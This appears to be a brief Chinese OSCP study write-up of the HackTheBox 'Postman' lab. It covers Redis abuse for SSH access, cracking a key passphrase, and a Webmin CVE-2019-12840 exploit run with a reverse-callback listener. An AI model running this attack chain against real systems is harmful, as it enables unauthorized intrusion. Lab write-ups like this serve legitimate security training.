OSCP备考_0x22_HackThBox靶机_Linux_postman
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)
nmap -sU --top-ports 100 10.129.20.206 (扫描UDP)
http://10.129.20.206/#first-section
没有可直接地用的地方那就试试看直接登入6379,
redis-cli -h 10.129.20.206
通过上面图片我们发现我们具有写入的权限
先在本地的kali上创建密钥
ssh-keygen
使用之前的私钥进行连接
ssh -i yes redis@10.129.20.206
直接拿到SHELL
手动枚举并没有什么有用的信息
所以上传linpeas进行枚举
有个密钥可以使用ssh2john进行转换 里面有具体操作过程,可以获取到一个密码computer2008
ssh2john id_rsa > hash_key
john hash_key --wordlist=/usr/share/wordlists/rockyou.txt
computer2008
search cve-2019-12840
use 0
set RHOSTS 10.10.10.160
set PASSWORD computer2008
set USERNAME Matt
set SSL True
run
提权到ROOT权限
使用10000端口上的webmin
python 50809.py -t https://10.129.20.206:10000 -c Matt:computer2008 -LS 10.10.16.31:8001 -L 10.10.16.31 -P 3333